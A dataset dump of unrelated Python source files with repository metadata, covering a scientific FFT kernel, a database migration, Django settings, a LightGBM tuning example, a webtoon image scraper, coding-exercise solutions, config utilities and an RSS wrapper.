user_agent = 'EBI-Sample-Client/%s (%s; Python %s; %s) %s' % (
clientVersion, os.path.basename(__file__),
platform.python_version(), platform.system(),
urllib_agent
)
self.logging.info('getUserAgent: user_agent: ' + user_agent)
self.logging.info('getUserAgent: End')
return user_agent
def get_headers(self, content='default'):
"""
:param str content: ste to default that is application/x-www-form-urlencoded
so that it has the same behaviour as urllib2 (Sept 2014)
"""
headers = {}
headers['User-Agent'] = self.getUserAgent()
headers['Accept'] = self.content_types[content]
headers['Content-Type'] = self.content_types[content]
#"application/json;odata=verbose" required in reactome
#headers['Content-Type'] = "application/json;odata=verbose" required in reactome
return headers
def debug_message(self):
print(self.last_response.content)
print(self.last_response.reason)
print(self.last_response.status_code)
| [
"[email protected]"
] | |
15eb72ad636edbf32a27501814ebe6ead6ccc591 | 3c750d4d60660fdf6ef84d7b7ab9663fb76d0fa1 | /sopht/numeric/eulerian_grid_ops/poisson_solver_2d/scipy_fft_2d.py | c27c75ab0c351c35f8a07f4cc81135a2084dd26a | [
"MIT"
] | permissive | SophT-Team/SophT | 25d157a17734600e9aa4f522b4574bfefe202bc7 | 99a094e0d6e635e5b2385a69bdee239a4d1fb530 | refs/heads/main | 2023-08-31T21:14:10.304592 | 2023-08-31T17:00:38 | 2023-08-31T17:00:38 | 498,451,510 | 2 | 2 | MIT | 2023-09-12T15:37:31 | 2022-05-31T18:25:12 | Python | UTF-8 | Python | false | false | 457 | py | """Create reference FFT operations via scipy in 2D."""
import numpy as np
from scipy.fft import irfftn, rfftn
def fft_ifft_via_scipy_kernel_2d(
fourier_field: np.ndarray,
inv_fourier_field: np.ndarray,
field: np.ndarray,
num_threads: int = 1,
) -> None:
"""Perform reference FFT operations via scipy."""
fourier_field[...] = rfftn(field, workers=num_threads)
inv_fourier_field[...] = irfftn(fourier_field, workers=num_threads)
| [
"[email protected]"
] | |
0856f6a1b38760b3161698bc0ef30a8a3bca0ed4 | 360c777a2b77be466b1cf7c8fd74d6fd04f56b55 | /migrations/versions/7844211fb55_.py | 7d304f72a21244221e00963d026d4463433f0936 | [
"MIT"
] | permissive | hreeder/nexus-auth | 790a3b2623ddf443138a4b0f0af1380dbc4db8ae | 8d51aef01647e32ba4a284f02de73a2caad7cf49 | refs/heads/master | 2021-01-10T10:08:37.190558 | 2016-02-29T12:27:21 | 2016-02-29T12:27:21 | 52,789,087 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | """empty message
Revision ID: 7844211fb55
Revises: c5242907c1e
Create Date: 2014-07-30 10:23:03.502189
"""
# revision identifiers, used by Alembic.
revision = '7844211fb55'
down_revision = 'c5242907c1e'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('character', sa.Column('lastKnownShip', sa.Integer(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('character', 'lastKnownShip')
### end Alembic commands ###
| [
"[email protected]"
] | |
cf7ab34a660f56433f5b54ab6324670467ea001f | 214dbac428fc8ad18d8775cd3ffd744068a77d24 | /my_django_app/settings.py | 9cc596a67ddf070aaa58ab4421bb25e912c69226 | [] | no_license | nsalahdeen/DjangoProject | 879c609fd5b53cf4be3a0ff5358d70adfbebbcf7 | 65a1bdcddb719e27ca67cd12aa47171f50370036 | refs/heads/main | 2023-04-20T04:25:20.608614 | 2021-05-04T15:51:50 | 2021-05-04T15:51:50 | 364,306,188 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,341 | py | """
Django settings for my_django_app project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = str(os.getenv('SECRET_KEY'))
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'my_first_django_app', #my firstApp
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'my_django_app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
"/templates", Path.joinpath(BASE_DIR, "templates")
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'my_django_app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"[email protected]"
] | |
e572940f400c4443799befdb71ed04fca2b087fd | 0305c23d48ee6e17722124aed5f90f55f1a2f5ef | /examples/lightgbm_examples/classification.py | 9924b8bca54a03c1e353420d2547fd5d7404cf68 | [
"MIT"
] | permissive | mdjabc/hyperparameter_hunter | d20a01fa6a3493fdbb595f8b5615a9d9ff398770 | bfbd1faf63272a62e6f971d7e9a0487d71aea8f6 | refs/heads/master | 2020-05-16T01:39:39.275129 | 2019-04-02T01:16:30 | 2019-04-02T01:16:30 | 182,608,190 | 1 | 0 | MIT | 2019-04-22T02:21:50 | 2019-04-22T02:21:49 | null | UTF-8 | Python | false | false | 2,453 | py | from hyperparameter_hunter import Environment, CVExperiment
from hyperparameter_hunter import RandomForestOptimization, Real, Integer, Categorical
import pandas as pd
from sklearn.datasets import fetch_covtype
from sklearn.metrics import f1_score
from lightgbm import LGBMClassifier
#################### Format DataFrame ####################
# Be advised, this dataset (SKLearn's Forest Cover Types) can take a little while to download...
# This is a multi-class classification task, in which the target is label-encoded.
data = fetch_covtype(shuffle=True, random_state=32)
train_df = pd.DataFrame(data.data, columns=["x_{}".format(_) for _ in range(data.data.shape[1])])
train_df["y"] = data.target
#################### Set Up Environment ####################
env = Environment(
train_dataset=train_df,
results_path="HyperparameterHunterAssets",
target_column="y",
metrics=dict(f1=lambda y_true, y_pred: f1_score(y_true, y_pred, average="micro")),
cv_type="StratifiedKFold",
cv_params=dict(n_splits=5, random_state=32),
)
# Now that HyperparameterHunter has an active `Environment`, we can do two things:
#################### 1. Perform Experiments ####################
experiment = CVExperiment(
model_initializer=LGBMClassifier,
model_init_params=dict(boosting_type="gbdt", num_leaves=31, max_depth=-1, subsample=0.5),
model_extra_params=dict(
fit=dict(
feature_name=train_df.columns.values[:-1].tolist(),
categorical_feature=train_df.columns.values[11:-1].tolist(),
)
),
)
# And/or...
#################### 2. Hyperparameter Optimization ####################
optimizer = RandomForestOptimization(iterations=10, random_state=32)
optimizer.set_experiment_guidelines(
model_initializer=LGBMClassifier,
model_init_params=dict(
boosting_type=Categorical(["gbdt", "dart"]),
num_leaves=Integer(10, 40),
max_depth=-1,
subsample=Real(0.3, 0.7),
),
model_extra_params=dict(
fit=dict(
feature_name=train_df.columns.values[:-1].tolist(),
categorical_feature=train_df.columns.values[11:-1].tolist(),
)
),
)
optimizer.go()
# Notice, `optimizer` recognizes our earlier `experiment`'s hyperparameters fit inside the search
# space/guidelines set for `optimizer`.
# Then, when optimization is started, it automatically learns from `experiment`'s results
# - without any extra work for us!
| [
"[email protected]"
] | |
7f8d4393203d77170ee56f9dc35fd118af389dbf | 69d8f3cf7c10640a692fa9175f5a63a5a7b54fcd | /naver_webtoon.py | 2a03516c541bf495641c72d69deb1ef931d4df67 | [] | no_license | baidoosik/crawling | bd89fd9f59ecb8921e765b03faadf1c55bd59c74 | 62669badf6ce84e0ac9e575b736e41051642ea9c | refs/heads/master | 2021-06-21T19:25:30.175798 | 2017-07-30T15:02:55 | 2017-07-30T15:02:55 | 84,198,685 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,083 | py | from crawling import *
def naver_webtoon(url):
ep_headers = {
'referer': 'http://comic.naver.com/webtoon/'
}
html = req.get(url, headers=ep_headers).text
soup = bfs(html, 'html.parser')
webtoon_name = ''.join(soup.select('div.detail h2')[0].text.split())
ep_name = soup.select('.tit_area h3')[0].text
result = []
n_result = []
file_list = []
max_width, max_height = 0, 0
for tag in soup.select('#comic_view_area img'):
try:
print(tag['src'])
result.append(tag['src'])
except KeyError:
print('필요한 자료 크롤링 완료')
break
for img_url in result:
print(img_url)
if re.match(r'^http.*$', img_url):
n_result.append(img_url)
for img_url in n_result:
img = req.get(img_url, headers=ep_headers).content
img_name = os.path.basename(img_url)
img_path = os.path.join(webtoon_name, ep_name, img_name)
dir_path = os.path.dirname(img_path)
if not os.path.exists(dir_path):
os.makedirs(dir_path)
if os.path.exists(img_path):
pass
else:
with open(img_path, 'wb') as f:
f.write(img)
file_list.append(img_path)
for img_url in file_list:
with Image.open(img_url) as im:
if max_width < im.width:
max_width = im.width
max_height = max_height + im.height
size = (max_width, max_height)
white = (255, 255, 255)
now =math.ceil(time.time())
with Image.new('RGB', size, white) as canvas:
height = 0
for filename in file_list:
with Image.open(filename) as im:
canvas.paste(im, box=(0, height))
height = height + im.height
canvas.save('{}.png'.format(now))
if __name__ =='__main__':
print('원하시는 웹툰의 url을 입력해 주세요!')
req_url=input()
print('으아아아 ~~요청하신 웹툰을 한 사진으로 만들어볼게요!!')
naver_webtoon(req_url) | [
"[email protected]"
] | |
c63011b271a1d1a905c1b4a064dc8fb4dfb1f928 | c957b4663cc4cb21e5172f23c6989031be8c3e5b | /python/830. Positions of Large Groups.py | a1f9bf5b13cad44b7186ef6646eebc9f05be1547 | [] | no_license | gajanlee/leetcode | e061dc37af0f83bf2bce00c391c0b8a9f3177b22 | 0d3c8477f05604a059e58a8764ce0d8bd418edde | refs/heads/master | 2018-12-26T06:12:24.995542 | 2018-10-30T05:03:27 | 2018-10-30T05:03:27 | 102,965,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,365 | py | """
In a string S of lowercase letters, these letters form consecutive groups of the same character.
For example, a string like S = "abbxxxxzyy" has the groups "a", "bb", "xxxx", "z" and "yy".
Call a group large if it has 3 or more characters. We would like the starting and ending positions of every large group.
The final answer should be in lexicographic order.
Example 1:
Input: "abbxxxxzzy"
Output: [[3,6]]
Explanation: "xxxx" is the single large group with starting 3 and ending positions 6.
Example 2:
Input: "abc"
Output: []
Explanation: We have "a","b" and "c" but no large group.
Example 3:
Input: "abcdddeeeeaabbbcd"
Output: [[3,5],[6,9],[12,14]]
Note: 1 <= S.length <= 1000
"""
class Solution:
def largeGroupPositions(self, S):
"""
:type S: str
:rtype: List[List[int]]
"""
res = []
S += "#"
last = "$"
start = end = 0
for i, s in enumerate(S):
if s == last:
end += 1
elif end - start >= 2:
res.append([start, end])
start = end = i
else:
start = end = i
last = s
return res
# \1 是第一个分组括号
# {2,}代表字符串在长度2以上
return [[r.start(), r.end() - 1] for r in re.finditer(r'(\w)\1{2,}', S)] | [
"[email protected]"
] | |
26fb69f33707a68a52b9cf096ecea4d441b19610 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /9QbhjtbkXp3QZNuDu_4.py | 0fdb756be15b9bb5f9a2c994e4cc0739f8aa07b5 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,027 | py | """
In this challenge, you have to find the last 15 palindromes of all numbers
starting from ten and up to a given limit, including the limit in the search.
Given an integer `limit` being the upper limit of the range of interest,
implement a function that returns the last 15 palindromes numbers lower **or
equal** to `limit` as a list sorted ascendingly.
### Examples
generate_palindromes(151) ➞ [
11, 22, 33, 44, 55,
66, 77, 88, 99, 101,
111, 121, 131, 141, 151
]
generate_palindromes(600) ➞ [
454, 464, 474, 484, 494,
505, 515, 525, 535, 545,
555, 565, 575, 585, 595
]
generate_palindromes(999999) ➞ [
985589, 986689, 987789, 988889, 989989,
990099, 991199, 992299, 993399, 994499,
995599, 996699, 997799, 998899, 999999
]
### Notes
N/A
"""
def generate_palindromes(limit):
is_pal = lambda n: str(n) == str(n)[::-1]
ans = []
while len(ans)<15:
if is_pal(limit): ans = [limit] + ans
limit-=1
return ans
| [
"[email protected]"
] | |
8513a8e7ee09df250f1ac7d1b06dc0a64cd08208 | 2a6f4b01b5ef2729eef6b24cba926f90edace478 | /vectorbt/utils/config.py | 3ae73a71793ae3c6a482ea095078ea8b9839342b | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | nehcuh/vectorbt | c8c413f11a8e1503f75477e41fc30127c1300236 | c0f307169b19a0f26c1992a9e29f4be380c1b220 | refs/heads/master | 2023-04-11T14:17:08.590766 | 2021-04-07T13:12:11 | 2021-04-07T13:12:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,664 | py | """Utilities for configuration."""
from copy import copy
from collections import namedtuple
import dill
import inspect
from vectorbt.utils import checks
from vectorbt.utils.attr import deep_getattr
def get_func_kwargs(func):
"""Get keyword arguments of the function."""
signature = inspect.signature(func)
return {
k: v.default
for k, v in signature.parameters.items()
if v.default is not inspect.Parameter.empty
}
class atomic_dict(dict):
"""Dict that behaves like a single value when merging."""
pass
def merge_dicts(*dicts):
"""Merge dicts."""
x, y = dicts[0], dicts[1]
if x is None:
x = {}
if y is None:
y = {}
checks.assert_type(x, dict)
checks.assert_type(y, dict)
if len(x) == 0:
z = y.copy()
elif len(y) == 0:
z = x.copy()
else:
z = {}
overlapping_keys = [k for k in x if k in y] # order matters
for k in overlapping_keys:
if isinstance(x[k], dict) and isinstance(y[k], dict) and not isinstance(y[k], atomic_dict):
z[k] = merge_dicts(x[k], y[k])
else:
z[k] = y[k]
for k in [k for k in x if k not in y]:
z[k] = x[k]
for k in [k for k in y if k not in x]:
z[k] = y[k]
if len(dicts) > 2:
return merge_dicts(z, *dicts[2:])
return z
def copy_dict(dct):
"""Copy dict using shallow-deep copy hybrid.
Traverses all nested dicts and copies each value using shallow copy."""
dct_copy = dict()
for k, v in dct.items():
if isinstance(v, dict):
dct_copy[k] = copy_dict(v)
else:
dct_copy[k] = copy(v)
return dct_copy
_RaiseKeyError = object()
DumpTuple = namedtuple('DumpTuple', ('cls', 'dumps'))
class Pickleable:
"""Superclass that defines abstract properties and methods for pickle-able classes."""
def dumps(self, **kwargs):
"""Pickle to a string."""
raise NotImplementedError
@classmethod
def loads(cls, dumps, **kwargs):
"""Unpickle from a string."""
raise NotImplementedError
def save(self, fname, **kwargs):
"""Save dumps to a file."""
dumps = self.dumps(**kwargs)
with open(fname, "wb") as f:
f.write(dumps)
@classmethod
def load(cls, fname, **kwargs):
"""Load dumps from a file and create new instance."""
with open(fname, "rb") as f:
dumps = f.read()
return cls.loads(dumps, **kwargs)
class Config(dict, Pickleable):
"""Extends dict with config features."""
def __init__(self, *args, frozen=False, read_only=False, **kwargs):
super().__init__(*args, **kwargs)
self._frozen = frozen
self._read_only = read_only
self._init_config = copy_dict(self) if not read_only else None
@property
def frozen(self):
"""Whether this dict's keys are frozen."""
return self._frozen
@property
def read_only(self):
"""Whether this dict is read-only."""
return self._read_only
@property
def init_config(self):
"""Initial config."""
return self._init_config
def __setitem__(self, k, v):
if self.read_only:
raise TypeError("Config is read-only")
if self.frozen:
if k not in self:
raise KeyError(f"Key '{k}' is not valid")
super().__setitem__(k, v)
def __delitem__(self, k):
if self.read_only:
raise TypeError("Config is read-only")
super().__delitem__(k)
def pop(self, k, v=_RaiseKeyError):
if self.read_only:
raise TypeError("Config is read-only")
if v is _RaiseKeyError:
return super().pop(k)
return super().pop(k, v)
def popitem(self):
if self.read_only:
raise TypeError("Config is read-only")
return super().popitem()
def clear(self):
if self.read_only:
raise TypeError("Config is read-only")
return super().clear()
def update(self, *args, force_update=False, **kwargs):
other = dict(*args, **kwargs)
if force_update:
super().update(other)
return
if self.read_only:
raise TypeError("Config is read-only")
if self.frozen:
for k in other:
if k not in self:
raise KeyError(f"Key '{k}' is not valid")
super().update(other)
def copy(self):
return type(self)(self)
def merge_with(self, other, **kwargs):
"""Merge this and other dict into a new config."""
return self.__class__(merge_dicts(self, other), **kwargs)
def reset(self):
"""Reset to the initial config."""
if self.read_only:
raise TypeError("Config is read-only")
self.update(copy_dict(self.init_config), force_update=True)
def dumps(self, **kwargs):
"""Pickle to a string."""
config = dict(frozen=self.frozen, read_only=self.read_only)
for k, v in self.items():
if k in ('frozen', 'readonly'):
raise ValueError(f"Keyword argument repeated: {k}")
if isinstance(v, Pickleable):
config[k] = DumpTuple(cls=v.__class__, dumps=v.dumps(**kwargs))
else:
config[k] = v
return dill.dumps(config, **kwargs)
@classmethod
def loads(cls, dumps, **kwargs):
"""Unpickle from a string."""
config = dill.loads(dumps, **kwargs)
for k, v in config.items():
if isinstance(v, DumpTuple):
config[k] = v.cls.loads(v.dumps, **kwargs)
return cls(**config)
def __eq__(self, other):
return checks.is_deep_equal(dict(self), dict(other))
class AtomicConfig(Config, atomic_dict):
"""Config that behaves like a single value when merging."""
pass
class Configured(Pickleable):
"""Class with an initialization config.
All operations are done using config rather than the instance, which makes it easier to pickle.
!!! warning
If the instance has writable attributes or depends upon global defaults,
their values won't be copied over. Make sure to pass them explicitly to
make the saved & loaded / copied instance resilient to changes in globals."""
def __init__(self, **config):
self._config = Config(config, read_only=True)
@property
def config(self):
"""Initialization config."""
return self._config
def copy(self, **new_config):
"""Create a new instance based on the config.
!!! warning
This "copy" operation won't return a copy of the instance but a new instance
initialized with the same config."""
return self.__class__(**self.config.merge_with(new_config))
def dumps(self, **kwargs):
"""Pickle to a string."""
return self.config.dumps(**kwargs)
@classmethod
def loads(cls, dumps, **kwargs):
"""Unpickle from a string."""
return cls(**Config.loads(dumps, **kwargs))
def __eq__(self, other):
"""Objects are equal if their configs are equal."""
if type(self) != type(other):
return False
return self.config == other.config
def getattr(self, attr_chain):
"""See `vectorbt.utils.attr.deep_getattr`."""
return deep_getattr(self, attr_chain)
def update_config(self, *args, **kwargs):
"""Force-update the config."""
self.config.update(*args, **kwargs, force_update=True)
| [
"[email protected]"
] | |
01e300e4ad3f48c320b5035e476c2a1eefe88cf8 | 75bb245280a749fcb1a74e94a62b78e4ceed16f0 | /message_manager.py | 6157da0ba6e39a61f90304e3c8d370c579e628bd | [] | no_license | cjlavan/rpi_set_wifi | 72cee2a8e4531b52398ff28f2abec47a269202d6 | 7600d05d8c9fa0d6c96663e3e86ca33095f56e0b | refs/heads/master | 2016-09-10T20:45:02.874265 | 2015-05-11T00:30:19 | 2015-05-11T00:30:19 | 35,393,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,989 | py | import requests
import os
import os.path
import json
from unipath import Path
import datetime
import time
import wget
import _SETTINGS
import convert
from message_queue import message_queue
class message_manager:
def __init__(self):
self.new_messages = False
self.BASE_DIR = os.path.dirname(os.path.abspath(__file__))
self.OUTPUT_DIR = Path(self.BASE_DIR).child('audio_output')
os.chdir(self.OUTPUT_DIR)
convert.remove_files(self.OUTPUT_DIR)
self.latest_id = int(self.get_latest_msg_id_json())
self.new_messages = False
self.MessageList = []
self.load_stored_message_json()
self.DownloadMessageList = []
self.post_download_message_json()
if self.new_messages:
self.alert_new_messages()
self.download_audio()
self.new_messages = False
def update_loop(self):
while True:
convert.remove_files(self.OUTPUT_DIR)
self.post_download_message_json()
if self.new_messages:
self.alert_new_messages()
self.download_audio()
self.new_messages = False
convert.remove_files(self.OUTPUT_DIR)
time.sleep(10)
# loads the initial json file to compare to what will be downloaded
# reads the initial json file and converts it to a list of message objects
def load_stored_message_json(self):
os.chdir(self.OUTPUT_DIR)
len_mes = 0
try:
jsonData = open('stored_message_data.json')
stored_data = json.load(jsonData)
len_mes = len(stored_data)
jsonData.close()
except:
with open('stored_message_data.json', 'w') as f:
json.dump([], f)
f.close()
self.MessageList = []
print "length of len_mes: " + str(len_mes)
for x in range (0,len_mes):
m = {
'msg_id' : stored_data[x]["msg_id"],
'audio_file' : stored_data[x]["audio_file"],
'path' : self.OUTPUT_DIR,
'color' : stored_data[x]["color"],
'ts' : stored_data[x]["ts"],
'played' : stored_data[x]["played"]
}
self.MessageList.append(m)
# print "appened message list with " + str(m['msg_id'])
# posts to server reads incoming json into download message list
def post_download_message_json(self):
Downloaded_messages_json = (requests.post(_SETTINGS.url, data=json.dumps(_SETTINGS.payload))).text
Downloaded_messages_json = json.loads(Downloaded_messages_json)
settings = json.dumps(Downloaded_messages_json["settings"])
i = len(Downloaded_messages_json["data"])
with open("config.json","w") as myfile:
myfile.write(settings)
myfile.close()
lookup_marker = 0
for x in range (i-1, 0, -1):
if int(Downloaded_messages_json["data"][x]["msg_id"]) > self.latest_id:
Downloaded_messages_json["data"][x].update({
'ts': str(json.dumps(datetime.datetime.now(),
default=self.get_iso_format))
})
m = {
'msg_id' : Downloaded_messages_json["data"][x]["msg_id"],
'audio_file' : "",
'download_link' : Downloaded_messages_json["data"][x]["audio_file"],
'path' : self.OUTPUT_DIR,
'color' : Downloaded_messages_json["data"][x]["color"],
'ts' : Downloaded_messages_json["data"][x]["ts"],
'played' : 0,
}
self.new_messages = True
self.DownloadMessageList.append(m)
# downloads audio for DownloadMessageList
def download_audio(self):
os.chdir(self.OUTPUT_DIR)
i = len(self.DownloadMessageList)
for x in range (0,i):
message = self.DownloadMessageList[0]
while not self.is_okay_to_work():
time.sleep(10)
local_file_name = wget.download(message['download_link'])
message['audio_file'] = local_file_name
self.save_new_message(message)
self.DownloadMessageList.remove(message)
# checks to see if messages are being played
# if no, then saves messages that has just been downloaded
def save_new_message(self, message):
while not self.is_okay_to_work():
time.sleep(10)
convert.convert(self.OUTPUT_DIR)
self.MessageList.append(message)
if int(message['msg_id']) > self.latest_id:
self.latest_id = int(message['msg_id'])
self.write_message_data()
def write_message_data(self):
os.chdir(self.OUTPUT_DIR)
while not self.is_okay_to_work:
time.sleep(10)
with open("stored_message_data.json","w") as output_file:
output_string = json.dumps(self.MessageList)
output_file.write(output_string)
output_file.close()
self.set_latest_msg_id_json()
# helper methods
# returns iso format time stamp
def get_iso_format(self, obj):
if hasattr(obj, 'isoformat'):
return obj.isoformat()
else:
raise TypeError, 'Object of type %s with value of %s is not JSON serializable' \
% (type(obj), repr(obj))
def alert_new_messages(self):
os.chdir(self.OUTPUT_DIR)
with open('new_message_status.json',"w") as f:
json.dump({'new_info':1}, f)
f.close()
def get_status_json(self):
os.chdir(self.OUTPUT_DIR)
try:
with open('player_status.json') as f:
data = json.load(f)
f.close()
return data['status']
except:
with open('player_status.json',"w") as f:
json.dump({'status':0}, f)
f.close()
return 0
def get_latest_msg_id_json(self):
os.chdir(self.OUTPUT_DIR)
try:
with open('latest_id_status.json') as f:
data = json.load(f)
f.close()
return data['latest_msg_id']
except:
with open('latest_id_status.json',"w") as f:
json.dump({'latest_msg_id':0}, f)
f.close()
return 0
def set_latest_msg_id_json(self):
with open('latest_id_status.json',"w") as f:
json.dump({'latest_msg_id':self.latest_id}, f)
f.close()
def is_okay_to_work(self):
os.chdir(self.OUTPUT_DIR)
if self.get_status_json() == 0:
return True
return False
| [
"[email protected]"
] | |
83ffb508c04c0a8d5c6bd89beb8e65a071ecc567 | 5d0edf31b17c5375faf6126c1a7be8e79bfe2ab8 | /buildout-cache/eggs/sc.photogallery-1.0b1-py2.7.egg/sc/photogallery/browser/view.py | 105b30e6969b968feec9c890f33eeb3a1d0d8455 | [] | no_license | renansfs/Plone_SP | 27cba32ebd9fc03dae3941ec23cf1bf0a7b6667a | 8a7bdbdb98c3f9fc1073c6061cd2d3a0ec80caf5 | refs/heads/master | 2021-01-15T15:32:43.138965 | 2016-08-24T15:30:19 | 2016-08-24T15:30:19 | 65,313,812 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,418 | py | # -*- coding: utf-8 -*-
from plone import api
from plone.dexterity.browser.view import DefaultView
from plone.memoize import forever
from plone.memoize.instance import memoizedproperty
from sc.photogallery.config import HAS_ZIPEXPORT
from sc.photogallery.interfaces import IPhotoGallerySettings
from sc.photogallery.utils import last_modified
from sc.photogallery.utils import PhotoGalleryMixin
from zope.component import getMultiAdapter
import os
if HAS_ZIPEXPORT:
from ftw.zipexport.generation import ZipGenerator
from ftw.zipexport.interfaces import IZipRepresentation
class View(DefaultView, PhotoGalleryMixin):
"""Slideshow view for Photo Gallery content type."""
def id(self):
return id(self)
@memoizedproperty
def results(self):
return self.context.listFolderContents()
@property
def is_empty(self):
return len(self.results) == 0
def image(self, obj, scale='large'):
"""Return an image scale if the item has an image field.
:param obj: [required]
:type obj: content type object
:param scale: the scale to be used
:type scale: string
"""
scales = obj.restrictedTraverse('@@images')
return scales.scale('image', scale)
def localized_time(self, obj, long_format=False):
"""Return the object time in a user-friendly way.
:param item: [required]
:type item: content type object
:param long_format: show long date format if True
:type scale: string
"""
return api.portal.get_localized_time(obj.Date(), long_format)
@property
def can_download(self):
"""Check if original images can be explicitly downloaded, that is,
if downloading is enabled globally and the current object allows it.
"""
record = IPhotoGallerySettings.__identifier__ + '.enable_download'
enabled_globally = api.portal.get_registry_record(record)
allow_download = self.context.allow_download
return enabled_globally and allow_download
def img_size(self, item):
return '{0:.1f} MB'.format(item.size() / float(1024 * 1024))
@property
def can_zipexport(self):
"""Check if original images can be downloaded as a ZIP file,
that is, if ftw.zipexport is installed and downloading is
allowed in the current object.
"""
return HAS_ZIPEXPORT and self.can_download
@property
def last_modified(self):
return last_modified(self.context)
def zip_url(self):
base_url = self.context.absolute_url()
url = '{0}/@@zip/{1}/{2}.zip'.format(
base_url, str(self.last_modified), self.context.getId())
return url
@forever.memoize
def _zip_size(self, last_modified=None):
if not HAS_ZIPEXPORT:
return '{0:.1f} MB'.format(0)
with ZipGenerator() as generator:
for obj in [self.context, ]:
repre = getMultiAdapter(
(obj, self.request), interface=IZipRepresentation)
for path, pointer in repre.get_files():
generator.add_file(path, pointer)
zip_file = generator.generate()
size = os.stat(zip_file.name).st_size
return '{0:.1f} MB'.format(size / float(1024 * 1024))
def zip_size(self):
return self._zip_size(self.last_modified)
| [
"[email protected]"
] | |
ca1535c9186ea6b4058c35374d2cd992af6df474 | a6106cedc42dcab94ccc4ee6d681372d2246ce5e | /python/활용자료/예제/07/ex7-7.py | 12dd6228f533058e5632e76aac1e1c9cac3cc731 | [] | no_license | leemyoungwoo/pybasic | a5a4b68d6b3ddd6f07ff84dc8df76da02650196f | 481075f15613c5d8add9b8c4d523282510d146d2 | refs/heads/master | 2022-10-08T19:57:26.073431 | 2020-06-15T06:50:02 | 2020-06-15T06:50:02 | 267,502,565 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | def circle_area(r) :
area = r * r * 3.14
return area
radius = int(input('원의 반지름을 입력하세요 : '))
result = circle_area(radius)
print('반지름 : %d, 원의 면적 : %.2f' % (radius, result))
radius = int(input('원의 반지름을 입력하세요 : '))
result = circle_area(radius)
print('반지름 : %d, 원의 면적 : %.2f' % (radius, result))
| [
"[email protected]"
] | |
bf4ee2d02a325b438c10d2b86a54a4028c965b9b | 3a6bf7337126c8b1883e76cf1f46cec0886f1447 | /rssdl/rss.py | 0280fcd0436b89dd40e7f313f365f2b62e554d0f | [
"Apache-2.0"
] | permissive | egustafson/rssdl | fc4265edd9138a54005b98bdfc1ea5dfb25707d5 | 2b42d8aa4a0d03d31629d8446e7336c6c1348e58 | refs/heads/master | 2020-12-24T06:57:21.265487 | 2017-09-15T20:59:58 | 2017-09-15T20:59:58 | 58,835,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | """ RSS DOM for RSSDL
"""
import feedparser
class Feed(object):
def __init__(self, href):
self._href = href
self._d = None
def result(self):
return self._d
def parse(self):
self._d = feedparser.parse(self._href)
return self._d.status if 'status' in self._d else 0
def data(self):
return self._d
## Local Variables:
## mode: python
## End:
| [
"[email protected]"
] | |
